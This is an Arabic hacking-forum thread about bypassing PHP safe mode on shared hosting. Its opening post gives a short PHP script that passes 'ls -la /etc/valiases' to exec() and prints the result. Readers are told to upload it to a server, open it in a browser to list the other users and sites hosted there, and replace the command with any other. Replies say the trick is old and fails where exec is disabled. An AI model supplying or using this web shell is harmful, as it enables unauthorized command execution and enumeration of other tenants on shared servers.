السلام عليكم كود الان احنا مخلين أمر ls -la /etc/valiases سو ملف وخله php وحط هالكود ورفعه على السيرفر واستعرضه من المتصفح وباذن الله بيطلعون وياك...

AZOZ

.:: شخصيات هامة ـ::.
تخطي السيف مود
السلام عليكم


كود

<?php

$last = exec('ls -la /etc/valiases',$output, $return);

print_r($output);
echo "Return [$return]";

?>




ا
لان احنا مخلين أمر ls -la /etc/valiases
سو ملف وخله php وحط هالكود ورفعه على السيرفر
واستعرضه من المتصفح وباذن الله بيطلعون وياك اليوزرات والمواقع
وغير ls -la /etc/valiases لأي أمر أخر وراح يضبط باذن الله



منقول
 

Spiral

New Member
تخطي السيف مود
جزاك ربي كل خير حبيبي

لكن الثغرة قديمة جدا

على العموم شكرا ، ما قصرت
 

Cracker SySteMs

New Member
تخطي السيف مود
يعطيك العافية :) والطريقه .. ما تنفع إلى على السيرفرات القديمه

اما السيرفرات الجديدة ماتنفع ;) ..

عموماً [[ مشكور ]]
 

IzRi-InO

New Member
تخطي السيف مود
شكرا
بس طريقة تنفع اذا دالة exec شغالة
والان في اخر تحديثات لما يكون سيف مود شغال اغلب دوال تكون مقفلة ومنها exec
 
أعلى